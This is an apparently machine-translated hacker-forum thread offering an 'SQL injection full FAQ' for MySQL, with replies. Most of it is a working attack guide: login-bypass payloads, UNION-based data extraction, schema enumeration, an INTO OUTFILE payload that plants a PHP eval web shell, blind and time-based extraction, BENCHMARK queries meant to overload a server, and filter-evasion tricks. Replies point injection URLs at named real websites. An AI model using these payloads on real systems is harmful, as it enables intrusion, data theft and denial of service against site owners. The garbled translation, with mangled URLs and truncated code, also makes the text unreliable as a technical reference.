Professional Documents
Culture Documents
Author Articles - SQL Injection Full FAQ - ANTICHAT - Security Online Community
Author Articles - SQL Injection Full FAQ - ANTICHAT - Security Online Community
LOG IN
Site promotion: * Conclusion in the TOP 10 I and G , raising the X , 3000+ reviews *
INFO Articles
→ 13 Next>
7 Jul 2007 #1
Dr.Z3r0
Leaders of the World
Author: Dr.Z3r0
Article postponed tordot.org
Please pay attention, here is the old version of this article and it will not be more
complete.
0.INTRO
0.1 Introduction
Laziv on the Internet in search of at least some information onSQL injection, you,
probably, often came across articles either very short, or not clear, or covering one topic,
or something else, which of course did not suit you. Once, I also collected somewhere
10-20 articles on this topic in order to penetrate into many subtleties of this vulnerability.
And remembering those times, I decided to write a complete FAQ on this topic so that,
so to speak, the others would not suffer. Those who find that I missed something, where
I made a mistake, etc., please write below, it’s difficult, after all, to keep everything in
my head . By the way, this is my first article, please do not throw tomatoes, and do
not kick your feet.
In general, in my opinion, the best way to learn how to work correctly with SQL
https://forum.antichat.ru/threads/43966/ 1/30
2019/4/14 Author articles - SQL injection full FAQ | ANTICHAT - Security online community
injection is not to read this article, but to lively practice , for example, to write a LOG IN
vulnerable script yourself or use my one given at the very end.
By the way, I advise you to read everything as there is something important for the next
item, etc.
And further. When reading, please note that this article is 2007, and it is a bit outdated.
Now (April 2010) I am trying to rewrite it in order to restore relevance.
Take for example the engine of this forum. From the user’s side it’s all beautiful. Given
the subject of the article, you should ask the question, where does the engine get the
information (even the same article, these letters)? Right! From the database!
Roughly speaking, the usual, in our understanding, database consists of a set of tables.
Each table, of course, has columns and rows. Actually, this is a key point. Take for
example the table of users of this forum. For each user, several parameters should be
described (nickname, soap, date regi, etc.). As a result, each column defines some
parameter of the users, and each row defines a specific user. And at the intersection of
the column and row we need, there will be information about the parameter of the
desired user.
(in general, it is an exaggerated description of relational databases, you can search for
details)
So I hope to understand the presentation. Now let's talk about the interaction with the
databases. To work with the database, a special SQL query language was developed (by
the way, I would advise you to look for a manual on it, it will be useful).
Code:
SELECT product FROM store WHERE (type = 'vodka' AND price = '200') LIMIT 1
Actually, in response to your request (SQL request), you (the script) receive a bottle
(information), and the seller (Database) no longer cares what you will do with it, since it
did its job. You can drink it, pour it, donate (process, withdraw, calculate) and so on.
https://forum.antichat.ru/threads/43966/ 2/30
2019/4/14 Author articles - SQL injection full FAQ | ANTICHAT - Security online community
LOG IN
Let's say you quit drinking. So you decided to go to the store for yogurt, and specially
wrote on a piece of paper " one packet of yogurt for 30 rubles"so as not to forget
why you came to the store. But you have an alcoholic friend (hacker, he is an attacker)
who corrected the inscription on a piece of paper (conducted a SQL injection attack) on
such" one kefir package for 30 rubles or one bottle of vodka for 200 rubles ".
As a result, you come to the store and say, using a piece of paper (incoming
parameter):" Give one packet of kefir for 30 rubles or one bottle of vodka for 200
rubles "
SELECT product FROM store WHERE (type = 'kefir' AND price = ' 30 ') OR (type = 'vodka' AND price =
'200 ') LIMIT 1
The seller, thinking that going further than the fridge with kefir than to the shelf with
vodka, gives you a bottle. And you with a clear conscience go home, where your
alcoholic friend is already waiting for you, pleased with the result))
Here is the actual SQL injection example. Here there is a lack of filtering incoming
parameters, you did not look at the fact that the second part of the note is written in
another handwriting?
Of course, this is all exaggerated, but I hope the idea of SQL queries and injections into
these queries you caught.
Last edited: Sep 6, 2011
7 Jul 2007 #2
Dr.Z3r0
Leaders of the World
Having understood this thought, you will understand that it is very easy to find a SQL
injection. It is necessary to insert single and double quotes in all fields, variables and
cookies.
Let's start with this scripthttp: //xxx/news.php? Id = 1 . Suppose that the original
query to the database looks like this:
Code:
https://forum.antichat.ru/threads/43966/ 3/30
2019/4/14 Author articles - SQL injection full FAQ | ANTICHAT - Security online community
Now we will add a quotation mark to the "id" variable, like this http: //xxx/news.php?
Id = 1 '
And, if the variable is not filtered, our query to the database will look like this:
Code:
Here we see a violation of the syntax and logic of the SQL query, and, as a result, the
database will not be able to correctly process such a query.
if an error report off the in this case, you can determine the presence of vulnerabilities
like this (would also not prevent it, which would not be confused with paragraph 1.2 As it
is described in the same paragraph.): http: //xxx/news.php id =? 1 '- that there is a
query to the database will be like this:
Code:
(For those who are in the tank “-“ this is the sign of the beginning of the comment,
everything after it will be discarded, I also want to draw your attention to the fact that
after it there must be a space (This is written in the MYSQL documentation) and, by the
way, too).
Thus, the request for MYSQL remains the same and displays the same as for http:
//xxx/news.php? Id = 1 The
entire paragraph 2 is devoted to what to do with this vulnerability.
Let's return to the news script . From the SQL language, we must remember that
numeric parameters can ( may be a keyword, since nothing does not prevent the
programmer from using the parameter with quotes ) is not framed with quotes, that is,
with such a call to the scripthttp: //xxx/news.php? id = 1 query to the database can
(!) look like this:
Code:
You can also detect this injection by inserting quotes into the 'id' parameter and then we
will see the error message:
mysql_query (): 1 ' '
1. Quotation filtered
https://forum.antichat.ru/threads/43966/ 4/30
2019/4/14 Author articles - SQL injection full FAQ | ANTICHAT - Security online community
What to do if in the same authorization script there is no quotation check? IMHO it would
be at least stupid to use this injection to display some sort of information. Let the query
to the database be of the type:
Code:
Unfortunately, the password '123' does not fit , but we have found an injection in the
'login' parameter and in order to register under the nickname 'Admin' we need to enter
something like this Admin instead - that is, the part with the password check is discarded
and we we enter under the name 'Admin'.
Code:
SELECT * FROM users WHERE login = '[COLOR = DarkOrange] Admin' - [/ COLOR] 'AND pass =' 12
And now what to do if the vulnerability in the 'pass' field. We enter the following in this
field 123 'OR login =' Admin '- . The request will be as follows:
Code:
SELECT * FROM users WHERE login = 'Admin' AND pass = [COLOR = DarkOrange] '123' OR login =
Code:
SELECT * FROM users WHERE (login = 'Admin' AND pass = '123') OR (login = 'Admin')
And after these actions, we will become the full owner of the account with the login
name 'Admin'.
In SQL there is a operator LIKE . It is used to compare strings. Here we allow the
https://forum.antichat.ru/threads/43966/ 5/30
2019/4/14 Author articles - SQL injection full FAQ | ANTICHAT - Security online community
Code:
SELECT * FROM users WHERE login LIKE 'Admin' AND pass LIKE '123'
Even if this script filters the quote, it still remains vulnerable to injection. Instead of the
password, we just need to enter "%" (For the LIKE operator, the "%" character matches
any string) and then the query will become
Code:
SELECT * FROM users WHERE login LIKE 'Admin' AND pass LIKE '%'
and let us go inside with the login 'Admin'. In this case, we not only found SQL injection
but also successfully used it.
Then only the type of vulnerability described in section 1.1 will be considered, and you
can redo the others yourself, it is not difficult
If in a nutshell, then it merges two requests into one. And this is very useful, since you
can specify almost completely your query to the database, for example, to display
information from any table.
Code:
SELECT * FROM news WHERE id = [COLOR = DarkOrange] '1' UNION SELECT 1 - [/ COLOR] '
The fact is that the number of columns before and after UNION must match, and an error
will probably come out (unless there is one column in the news table
): Used SELECT statements have a different number of columns
In this case, we need to select the number of columns (so that their number beforeand
after theUNION wouldmatch). We do it like this:
https://forum.antichat.ru/threads/43966/ 6/30
2019/4/14 Author articles - SQL injection full FAQ | ANTICHAT - Security online community
And this method is based on the selection of the number fields using GROUP BY . That is
a request of this type:
http: //xxx/news.php? Id = 1 'GROUP BY 2 -
It will be displayed without errors if the number of fields is less than or equal to 2.
We make a request of this type:
http: // xxx / news. php? id = 1 'GROUP BY 10 -
So there are fewer columns than 10. We divide 10 by 2. And we make a query
http: //xxx/news.php? id = 1 'GROUP BY 5 -
Oops! There is no error - it means that the number of columns is greater than or equal
to 5 but less than 10. Now we take the average value between 5 and 10, it turns out
like 7. Do the query:
http: //xxx/news.php? Id = 1 'GROUP BY 7 -
Doesthis mean more or equal to 5 but less than 7. Make another request
http: //xxx/news.php? Id = 1 ' GROUP BY 6 -
No errors ...greater than or equal to 6 but less than 7. It follows that the required
number of columns is 6.
The same principle as in clause 2.1.1.2 only uses the ORDER BY function . And the error
text slightly changes if there are more fields.
mysql_query (): Unknown column '10' in 'order clause'
I think that for many of us exactly such a page like http: //xxx/news.php? id = 1
does not suit. So we need to make sure that nothing is output on the first request
(before UNION ). Roughly speaking, you need to cut off the output from the first request.
https://forum.antichat.ru/threads/43966/ 7/30
2019/4/14 Author articles - SQL injection full FAQ | ANTICHAT - Security online community
The easiest way is to change the "id" from '1' to '-1' (or to '9999999'): LOG IN
http: //xxx/news.php? Id = -1 'UNION SELECT 1,2,3,4,5, 6 -
Now we have some where in the page should be displayed any of these numbers. (For
example, since this is conditionally a news script, then in the “News title” it will be
displayed, let's say 3, “News” -4 and so on). Now, in order for us to get some
information, we need to replace these numbers in the application to the script with the
functions we need. If the digits are not displayed anywhere, then most likely the
conclusion is missing and the remaining subclauses of clause 2.1 can be skipped.
This same XSS, it is only carried out through a request to the database. Example:
http: //xxx/news.php? Id = -1 'UNION SELECT 1,2,3,' <script> alert ('SIXSS')
</ script> ', 5,6 - Well, I think not understand it’s difficult that 4 in the page will be
replaced by <script> alert ('SIXSS') </ script> and accordingly the exact same XSS
will turn out.
If you know the names of tables and columns in the database, you can skip this item.
If you do not know ... There are two ways.
2.1.4.1 Names of columns / tables if you have access to INFORMATION_SCHEMA and if the
version MYSQL> = 5 The
Well, we found the Users table. Only this ... ahem ... the columns don't know ... Then
the INFORMATION_SCHEMA.COLUMNS table comes to the rescueThe column
COLUMN_NAME contains the name of the column in the table TABLE_NAME . This is
how we retrieve the column names.
http: //xxx/news.php? id = -1 'UNION SELECT 1,2,3, COLUMN_NAME, 5,6 FROM
INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME =' Users' LIMIT 0.1 -
https://forum.antichat.ru/threads/43966/ 8/30
2019/4/14 Author articles - SQL injection full FAQ | ANTICHAT - Security online community
LOG IN
http: // xxx / news.php? id = -1 'UNION SELECT 1,2,3, COLUMN_NAME, 5,6
FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME =' Users' LIMIT
1,1 -
etc.
Unfortunately, the usual brute force comes into force here ... Example:
http: //xxx/news.php? Id = -1 'UNION SELECT 1,2,3,4, 5.6 FROMTable_name -
Well, we have introduced, to the happiness,Users Offline, missing the error message,
and the page will appear as ifhttp : //xxx/news.php? id = -1 'UNION SELECT
1,2,3,4,5,6 - what does this mean? This means that there is aUserstableand you need
to start sorting the columns.
http: //xxx/news.php? id = -1 'UNION SELECT 1,2,3, Column Name , 5,6 FROM
Users -
It is necessary to select Column Name until the error message of the type disappears:
mysql_query (): Unknown column ' Columnname ' 'in' field list '
And this is how we learned that in the Users tablethere are login , password columns.
There is in MYSQL such an interesting function of type SELECT ... INTO OUTFILE that
allows you to write information to a file. Or, such a SELECT ... INTO DUMPFILE
construction is almost similar and you can use any.
https://forum.antichat.ru/threads/43966/ 9/30
2019/4/14 Author articles - SQL injection full FAQ | ANTICHAT - Security online community
LOG IN
There are several limitations for it.
But what would prevent us from making the web go? For example:
http: //xxx/news.php? Id = -1 'UNION SELECT 1,2,3,' <? Php eval ($ _ GET
['e'])?> ', 5,6 INTO OUTFILE '1.php' -
It remains only to find the full path to the root of the site on the server and append it
before 1.php. In principle, you can find another error in the report which will see the
path on the server or leave it at the root of the server and pick it up with a local
connection, but this is another topic.
In most cases, SQL server is reached due to the fact that nothing else can be done. The
type could not recognize the tables / columns, no rights to it, no rights to it, etc. I’m
honestly against this method but still ...
Code:
That is, here this function does md5 (current_time) 100,000 times, which takes about
0.7 seconds on my computer ... It seemed like this ... And if you try the embedded
BENCHMARK ?
https://forum.antichat.ru/threads/43966/ 10/30
2019/4/14 Author articles - SQL injection full FAQ | ANTICHAT - Security online community
Code: LOG IN
SELECT BENCHMARK (100000, BENCHMARK (100000, md5 (current_time)))
It takes a very long time to be honest, I didn’t even wait ... I had to do a reset .
Enough 100 times poke F5 and "the server will fall into a fast down"))).
Last edited: 27 Apr 2010
7 Jul 2007 #3
Dr.Z3r0
Leaders of the World
The idea of this method is to try to find the output in the error report. That is,
dynamically transfer any substring to a muscle error.
In general, I see no reason to try to clarify the meaning and logic of the request,
honestly speaking, he barely doped himself)
Code:
SELECT COUNT (*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3) x GROUP BY CONCAT (MID ([B]
The disadvantage of this method is the impossibility to output your string longer than 63
characters at a time, and of course the need to include an error report display.
https://forum.antichat.ru/threads/43966/ 11/30
2019/4/14 Author articles - SQL injection full FAQ | ANTICHAT - Security online community
LOG IN
As a result of the previous query, we will see an error like:
Duplicate entry ' 5.0.45-community-nt 0' for key 1
Keep in mind that the last zero in the line "5.0.45-community-nt0" does not apply to it,
and is the result of the execution of the FLOOR (RAND (0) * 2) command, without which
it would not be possible to provoke an error. And because of which we print 63 characters
instead of 64 characters, as it might have initially seemed.
Code:
Now we modify it via the vulnerable id parameter before such a request (if we are
unfamiliar, go to step 5 and read):
Code:
SELECT * FROM news WHERE id = '[COLOR = DarkOrange] -1' OR id = IF (ASCII ((SELECT USER ()
What does this give us ? To begin, MYSQL performs a SELECT USER () subquery into the
ASCII () function that returns the ascii code of the first character from the result of the
subquery, and the IF () function returns 1 if this code is greater than or equal to 100.
Code:
and it is executed in the same way as when accessing the script http:
//xxx/news.php? id = 1 and if the code of this number is less then the main query
becomes
Code:
https://forum.antichat.ru/threads/43966/ 12/30
2019/4/14 Author articles - SQL injection full FAQ | ANTICHAT - Security online community
Let's call it conditionally that the request returns 1 (yes) or 0 (no), respectively, and
LOG IN
begin to iterate.
What should I do if there are no displayed fields and error reporting is turned off? The
BENCHMARK function will come to our rescue . As it was written above, this function
performs one action several times. Well, what do you ask ... And that's what. Recall that
request
https://forum.antichat.ru/threads/43966/ 13/30
2019/4/14 Author articles - SQL injection full FAQ | ANTICHAT - Security online community
Code: LOG IN
SELECT BENCHMARK (100000, BENCHMARK (100000, md5 (NOW ())))
it is performed sooo long, and based on delays (no, do not be scared, not those delays
that you just thought) we will sort through some parameter, let’s the name of the user
under which we are connected to the database (the USER () function displays it ).
Code:
And now, by analogy with the previous paragraph, we will go through the string USER ()
. Only in this case, instead of 0, the function will perform this request for a very long
time, which will tell us that the request returned 0 and, accordingly, if without any delay,
the request returns 1 .
Now let's talk about the delay time. In order to determine the return time of 0 and 1,
you must first make several requests:
http: //xxx/news.php? Id = -1 'OR id = IF (99> 100, 1, BENCHMARK ( 2999999
, MD5 (NOW () ))) -
Will return 0. Need to detect time. Depending on the width of your channel, you need to
pick the number 2999999 before the current , so that you can accurately judge whether
there was a delay or not compared to
http: //xxx/news.php? Id = -1 'OR id = IF (101> 100, 1, BENCHMARK
(2999999, MD5 (NOW ()))) -
which will return 1 .
ATTENTION! In this case, the main thing is not to forget that after each BENCHMARK
execution, the SQL server needs to be given some time to rest. (Slightly more than the
BENCMARK execution itself ). Otherwise, the results of this search may be incorrect.
In fact, this function creates the delay we need in the response of the web server, and
note, without unnecessary loads on it. That is, SLEEP () is the best alternative to
BENCHMARK () and it is desirable to use it , but I repeat the only negative - this
function only appeared in the 5th branch. Tale, and only.
https://forum.antichat.ru/threads/43966/ 14/30
2019/4/14 Author articles - SQL injection full FAQ | ANTICHAT - Security online community
I use the value in two to three seconds, but I advise you to choose it according to the
server channel, as errors in the output may occur.
This item is written based on the article " New Benchmark Alternative or Effective Blind
SQL-injection " by Elekt , respect him.
This method is based on the fact that instead of returning 0 , a subquery is executed
which causes an error and it is possible to judge by the error output that it returned 0 ,
and by the absence of an error that it returned 1 . This method will help us if there are
no displayed fields, but the error report is turned ON (!) .
Code:
What do you think that will return this request? The error is correct because the id is
compared with a subquery that returns two rows.
mysql_query (): Subquery returns more than 1 row
This was a theory. Now go to the query with the help of which we will iterate the
characters
Code:
SELECT * FROM news WHERE id = '[COLOR = DarkOrange] -1' OR id = IF (ASCII (SUBSTRING ((SEL
As can be seen from this query, if the character code is greater than or equal to 100,
the IF () function returns 1 , and then no error occurs, and if the function performs a
subquery
Code:
which returns two lines that when comparing with id causes an error and we understand
that the request returned 0 .
A huge disadvantage of this method is the fact that huge amounts of errors accumulate
in the logs. A huge plus is the speed of work.
For some reason, many have formed the opinion that this is a hopeless case. Well, we
https://forum.antichat.ru/threads/43966/ 15/30
2019/4/14 Author articles - SQL injection full FAQ | ANTICHAT - Security online community
will change this opinion to the opposite. Suppose the query to the database looks like
LOG IN
this:
Code:
well, as always, the $ by variable does not pass filtering, and a few lines from the
database are displayed on the page. Well, we need to get two requests that would
somehow change the output to the page, but still the requests must be such so that we
can influence the result with the help of valid subqueries. What can such requests be
http: //xxx/news.php? By = (id * 1)
http: //xxx/news.php? By = (id * -1)
I hope you guessed the second time the sample will go "top to bottom" regarding the
first request, to understand why it is not difficult. Suppose for the first time it was
derived, we take it for the truth :
Code:
First news
Second news
Third news
Code:
Third news
Second news
First news
Well then, the query for the brut name of the current user will look like this:
http: //xxx/news.php? By = (id * IF (ASCII (SUBSTRING (USER (), 0.1)) =
112.1, -1) )
Well actually hatched reverse order news => false
http: //xxx/news.php by =? (id * the IF (the ASCII (the SUBSTRING (the USER
(), 0.1)) = 113.1, -1))
Again, a lie
Well, for a start, remember that for SQL a type / ** / construct is equal to a space.
https://forum.antichat.ru/threads/43966/ 16/30
2019/4/14 Author articles - SQL injection full FAQ | ANTICHAT - Security online community
LOG IN
Well, what to do if a similar design is filtered? Everything is elementary. You can use
brackets and apostrophes. For example:
Code:
SELECT * FROM news WHERE id = '[COLOR = DarkOrange] 1'UNION (SELECT (1), 2,3,4,5, (6) FROM
There is an interesting function CHAR () that returns the character itself by the character
code. Suppose the character is filtered ... well, let it be an asterisk (*). First we need to
know the code of this symbol. In MYSQL, there is an ASCII () function that returns the
code of the leftmost character from the string passed to it, so
Code:
only on a vulnerable host it makes no sense (the symbol '*' is filtered) it needs to be
done on LAN. We learn that the code is 42 and we use the function CHAR () so
Code:
Another way is to use hexadecimal character code. Now suppose that the admin
nightingale is filtered. In MYSQL, there is a HEX () function that produces the
hexadecimal code of a string. Yuzatsya so
Code:
It will give out "61646D696E" ahead we add "0x" (To make SQL understand that it is
dealing with hexadecimal encoding) and we get "0x61646D696E" to use it without CHAR
() so
Code:
https://forum.antichat.ru/threads/43966/ 17/30
2019/4/14 Author articles - SQL injection full FAQ | ANTICHAT - Security online community
LOG IN
There is an elementary way to put the conversion of encodings on the shoulders of the
muscle. You can use a similar construct:
AES_DECRYPT (AES_ENCRYPT ( [Your request] , 'bla' ), 'bla' )
But! Kakba is no longer fashionable and very cumbersome, and somewhere in the wilds
of this topic I offered a different design a few years ago, a much smaller one:
UNHEX (HEX ( [Your request] ))
I hope that for SELECT, INSERT, UPDATE, DELETE, DROP you know, if not, then we climb
into this book to read: A great reference to the SQL language .
---------------------------- The
USER () function displays the user login under which we are connected to the MYSQL.
The
DATABASE () function displays the name of the database. to which we are connected
VERSION () displays the version of MYSQL
----------------------------
ASCII ( str ) returns the ASCII code of the first character in the string "str"
CHAR ( xx1, xx2, ... ) returns a string consisting of ASCII cosmic codes whose codes are
xx1, xx2, etc.
HEX ( str ) returns the hexadecimal equivalent of the string "str".
----------------------------
LENGTH ( str ) - Returns the length of the string "str".
SUBSTRING ( str, pos [, len] ) -Returns a substring of length len (if not specified, then to
the end of the string "str") characters from the string "str", starting from the position
pos.
LOCATE ( substr, str [, pos] )-Returns the position of the first occurrence of the substring
"substr" to the string "str" starting from the position pos (if not specified from the
beginning of the string "str"). If the substring "substr" in the string "str" is missing, it
returns 0.
----------------------------
LOWER ( str ) -translates to lower case string "str" (in my opinion only Latin)
CONCAT ( param1, param2, ... ) is the union of substrings into one string.
CONCAT_WS ( sep, param1, param2, ... ) is the union of the substrings into a single line
with the sep separator.
----------------------------
IF ( exp, ret1, ret2 )- Checks exp condition if it is true (not equal to 0) then returns the
string ret1 and if not, returns the string ret2.
------------------------------
expr BETWEEN min AND max -If the value of the expression expr is greater than or
equal to the specified value min and less than or equal to the specified value max, the
https://forum.antichat.ru/threads/43966/ 18/30
2019/4/14 Author articles - SQL injection full FAQ | ANTICHAT - Security online community
Code:
Code:
2) - another version of the comment in MySQL. The space after this sign is required.
Example:
Code:
3) / * * / analogue comment SI in MySQL. Starting with the 5.1 (?) Branch, the lafa
ends and for this type of comments you need a closing part. For MySQL, the space is not
individual. Examples:
Code:
Code:
Displays the login column if the MySQL version is equal to or higher than 3.23.02
You certainly understand what this entire article was written for this item. All items and their sub-items were
written only to understand the seriousness of the situation, and the author of this article is not responsible
for using these items for purposes contrary to the UKRF.
And the defense is very simple. By the way, all three rules apply to the three
methods of transmitting information to the server GET, POST, Cookie.
2) If the string comparison operator LIKE is used, filter the characters “%” and “_” LOG IN
- -----------------------------
3) Do not use when comparing variables without quotes of the type SELECT ... WHERE id
= $ id and use so SELECT ... WHERE id = '$ id' and refer to paragraph 1
Last edited: 28 Apr 2010
7 Jul 2007 #4
Dr.Z3r0
Leaders of the World
7.
ADDITIONS Free time was issued ... I don’t know if anyone needs it at all, but as
promised ...
Vulnerable script code
Code:
<? php
// Database Settings
$ script ['mysql_server'] = 'localhost'; // Host
$ script ['mysql_login'] = 'root'; // Login
$ script ['mysql_password'] = ''; // Password
$ script ['mysql_db'] = 'test'; // Database Name
mysql_select_db ($ script ['mysql_db']) or die ('I can not connect to the database');
https://forum.antichat.ru/threads/43966/ 20/30
2019/4/14 Author articles - SQL injection full FAQ | ANTICHAT - Security online community
LOG IN
Base dump
Code:
INSERT INTO `news` VALUES (1, '23 / 03/07 ', '12: 30', 'Hello vasya :)', 'Well, start
INSERT INTO `news` VALUES (2, '24 / 03/07 ',' 11:10 ',' Gee, and this is for a change
In general, I hope you understand what you need to do with this ...
Code:
$ header. = 'Cookie2: $ Version = 1'. "\ r \ n";
$ header. = "Host:". $ set ['h']. "\ r \ n \ r \ n";
$ dt = "";
$ fp = fsockopen ($ set ['h'], 80);
fwrite ($ fp, $ header);
while (! feof ($ fp)) $ dt. = fread ($ fp, 1024);
fclose ($ fp);
Code:
flush ();
}
7 Jul 2007 #5
.Slip
Elder - Elder
https://forum.antichat.ru/threads/43966/ 22/30
2019/4/14 Author articles - SQL injection full FAQ | ANTICHAT - Security online community
_Great_ said:
LOG IN
In general, this is not the first article on this topic. They are written with enviable frequency almost every
2 weeks.
7 Jul 2007 #6
Abra
member
I think it is to the fact that the statement "the most important thing is to filter the
quotes" is not right. Filtering doesn't need anything at all is not right.
4 Oct 2007 #7
[53x] Shadow
Leaders of Antichat
Update
addition
@@ basedir
@@ datadir
@@ tmpdir
@@ version_compile_os
Query example:
Code:
http://www.site.com/index.php? id
https://forum.antichat.ru/threads/43966/ 23/30
2019/4/14 Author articles - SQL injection full FAQ | ANTICHAT - Security online community
LOG IN
In some cases, if there is a local inclusion, it is possible to fill up the shell through the
muscle logs (as through the Apache logs).
You can often determine the type of OS, but not always, through version (), if the
returned version string is: the
string "-log" means OS * nix / linux
the string "-nt" means Windows type OS.
4 Nov 2007 #8
HornetBlack
Member
Everything is good in the FACs, but they do not really reveal one question - the variants
of the queries used in the scripts. Example:
such a query gives the number of fields
http://www.site.org/article.php?id=3+order+by+4
and this query returns the error
http://www.site.org/article.php ? id = 3 + union + select + 1,2,3,4
The used SELECT statements have a different number of columns
In which variant of the query can this happen? Immediately, I note that the quotation
mark or parenthesis after the parameter value gives an error.
It is clear that besides the simplest SELECT x FROM t WHERE p = 'nn' query there can be
more complex variants, including and using brackets. I would like to know the methods
by which you can "calculate" the structure of the query. Any ideas?
4 Nov 2007 #9
c411k
Members of Antichat
HornetBlack said:
Everything is good in the FACs, but they do not really reveal one question - the variants of the queries
used in the scripts. Example:
here such a query gives the number of fields
http://www.site.org/article.php?id=3+order+by+4
and this query returns the error
http://www.site.org/article.php ? id = 3 + union + select + 1,2,3,4
The used SELECT statements have a different number of columns
In which variant of the query can this happen? Immediately, I note that the quotation mark or parenthesis
after the parameter value gives an error.
It is clear that besides the simplest SELECT x FROM t WHERE p = 'nn' query there can be more complex
https://forum.antichat.ru/threads/43966/ 24/30
2019/4/14 Author articles - SQL injection full FAQ | ANTICHAT - Security online community
variants, including and using brackets. I would like to know the methods by which you can "calculate" the IN
LOG
structure of the query. Any ideas?
put a comment.
order by 4 / *
select 1,2,3,4 / *
4 Nov 2007 # 10
Scipio
Members of Antichat
HornetBlack said:
Code:
"select id, name, login, password, description from table where id =". $ id. ";"
"select id, name, login, password from table where id =". $ id. ";"
Code:
"select id, name, login, password, description from table where id = -1 order by 4 / *
"select id, name, login, password from table where id = -1 order by 4 / *
https://forum.antichat.ru/threads/43966/ 25/30
2019/4/14 Author articles - SQL injection full FAQ | ANTICHAT - Security online community
then this error will be spat out by the second query ... LOG IN
4 Nov 2007 # 11
HornetBlack
Member
Scipio said:
The idea is clear, but ... except for the union of requests through ";" in muscle is
allowed?
However, this is a special case of troubles, so I would really like to see in some FAQs an
analysis of possible query constructions in scripts and injecting options.
4 Nov 2007 # 12
ENFIX
Elder - Elder
Scipio
Members of Antichat
HornetBlack said:
Мысль понятна, но... разве объединение запросов через ";" в мускуле разрешено?
Впрочем, это частный случай заморочки, поэтому очень хотелось бы в каком-нибудь FAQ-е увидеть
https://forum.antichat.ru/threads/43966/ 26/30
2019/4/14 Author articles - SQL injection full FAQ | ANTICHAT - Security online community
Впрочем, это частный случай заморочки, поэтому очень хотелось бы в каком нибудь FAQ е увидеть
анализ возможных конструкций запросов в скриптах и варианты инжектов. LOG IN
я прост привел пример, так сказать теоретический, для лучшего понимания, чтоб
тебе не заморачиваться еще и на синтаксис языка
HornetBlack
Member
Scipio said:
В том-то и беда, что ФАКи переписывают друг у друга, а хотелось бы видеть больше
реальных примеров решения подобных заморочек.
Если кому интересно, то могут покопать данный пример и предложить варианты
решения
http://www.soaw.org./article.php?id=322
Вот еще одна заморочка:
http://www.remhq.com/news_story.php?id=593
17 полей, но выяснить версию скули не дает - функции version,user,database,
похоже, фильтруются, зато есть XSS в полях
Scipio
Members of Antichat
HornetBlack said:
В том-то и беда, что ФАКи переписывают друг у друга, а хотелось бы видеть больше реальных
примеров решения подобных заморочек.
https://forum.antichat.ru/threads/43966/ 27/30
2019/4/14 Author articles - SQL injection full FAQ | ANTICHAT - Security online community
примеров решения подобных заморочек.
Если кому интересно, то могут покопать данный пример и предложить варианты решения LOG IN
http://www.soaw.org./article.php?id=322
Вот еще одна заморочка:
http://www.remhq.com/news_story.php?id=593
17 полей, но выяснить версию скули не дает - функции version,user,database, похоже, фильтруются,
зато есть XSS в полях
Дык без элементарных знаний sql никакие факи не помогут, тут нужен свой подход
да и подумать надо немного....
№1 - это примерно то, про что я тебе говорил, здесь помогут подзапросы
Code:
http://www.remhq.com/news_story.php?id=555592'%20union%20select%201,2,aes_decrypt(aes_encr
beerhack
Elder - Старейшина
I-I()/Ib said:
AES_DECRYPT(AES_ENCRYPT('строка'),'bla'),'bla')
Dr.Z3r0
Leaders of the World
beerhack said:
https://forum.antichat.ru/threads/43966/ 28/30
2019/4/14 Author articles - SQL injection full FAQ | ANTICHAT - Security online community
Code:
AES_DECRYPT(AES_ENCRYPT('строка','bla'),'bla')
Qwazar
Elder - Старейшина
Если отчет об ошибках выключен то в данном случае можно определить наличие уязвимости вот так :
http://xxx/news.php?id=1'; --
...
Таким образом для MYSQL запрос остается прежним и отобразиться тоже самое что и для
http://xxx/news.php?id=1
Scipio
Members of Antichat
Qwazar said:
Qwazar
Elder - Старейшина
Хотя заявлено:
https://forum.antichat.ru/threads/43966/ 29/30
2019/4/14 Author articles - SQL injection full FAQ | ANTICHAT - Security online community
Хотя заявлено:
LOG IN
Если отчет об ошибках выключен то в данном случае можно определить наличие уязвимости вот так
English (US)
ANTICHAT ™ © 2001-2027 Antichat Kft.
Contact Us Help Terms and Rules Privacy policy
https://forum.antichat.ru/threads/43966/ 30/30